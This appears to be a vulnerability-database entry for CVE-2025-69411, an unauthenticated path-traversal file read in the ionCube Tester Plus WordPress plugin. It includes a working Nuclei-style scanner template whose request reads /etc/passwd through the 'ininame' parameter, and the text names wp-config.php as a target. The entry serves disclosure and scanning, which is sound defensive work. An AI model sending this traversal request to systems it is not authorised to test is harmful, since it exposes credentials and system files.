/Vulnerability Library

ionCube Tester Plus <= 1.3 - Local File Inclusion

CVE-2025-69411
Early Release

Description

The ionCube Tester Plus plugin for WordPress versions <= 1.3 is vulnerable to unauthenticated arbitrary file read via path traversal. The 'ininame' parameter in loader-wizard.php is not properly sanitized, allowing attackers to read sensitive files such as wp-config.php and /etc/passwd without authentication.

Severity

High

CVSS Score

7.5

Exploit Probability

0%

Affected Product

ioncube-tester-plus

Published Date

March 23, 2026

Template Author

pussycat0x

CVE-2025-69411.yaml
id: CVE-2025-69411

info:
  name: ionCube Tester Plus <= 1.3 - Local File Inclusion
  author: pussycat0x
  severity: high
  description: |
    The ionCube Tester Plus plugin for WordPress versions <= 1.3 is vulnerable to unauthenticated arbitrary file read via path traversal. The 'ininame' parameter in loader-wizard.php is not properly sanitized, allowing attackers to read  sensitive files such as wp-config.php and /etc/passwd without authentication.
  remediation: |
    Update to the latest version beyond 1.3.
  impact:
    Attackers can access unauthorized files, potentially exposing sensitive information or system files.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ioncube-tester-plus/ioncube-tester-plus-13-unauthenticated-arbitrary-file-download
    - https://nvd.nist.gov/vuln/detail/CVE-2025-69411
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-69411
    epss-score: 0.00062
    epss-percentile: 0.19233
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    vendor: ioncube
    product: ioncube-tester-plus
    framework: wordpress
  tags: cve,cve2025,wordpress,wp,wp-plugin,lfi,ioncube-tester-plus

flow: http(1) && http(2)

http:
  - method:
    path:
      - "{{BaseURL}}/wp-content/plugins/ioncube-tester-plus/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - compare_versions(version, '<= 1.3')
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        name: version
        group: 1
        regex:
          - '(?i)Stable tag:\s+([0-9.]+)'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/ioncube-tester-plus/loader-wizard.php?page=phpconfig&download=1&ininame=../../../../../../../../etc/passwd"

    matchers:
      - type: dsl
        dsl:
          - contains(content_type, 'text/plain')
          - regex('root:.*:0:0:', body)
          - status_code == 200
        condition: and
# digest: 4b0a00483046022100b32bf0cc2be89f6cde363904321ededf956f609d8d3622c90c0867399264f4ed0221009e4ef4e849f037552a097736556cffca6e76d2747dd8764e589f5f017c8aed47:922c64590222798bb761d5b6d8e72950
7.5Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2025-69411
CWE ID:
cwe-22

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ioncube-tester-plus/ioncube-tester-plus-13-unauthenticated-arbitrary-file-downloadhttps://nvd.nist.gov/vuln/detail/CVE-2025-69411

Remediation Steps

Update to the latest version beyond 1.3.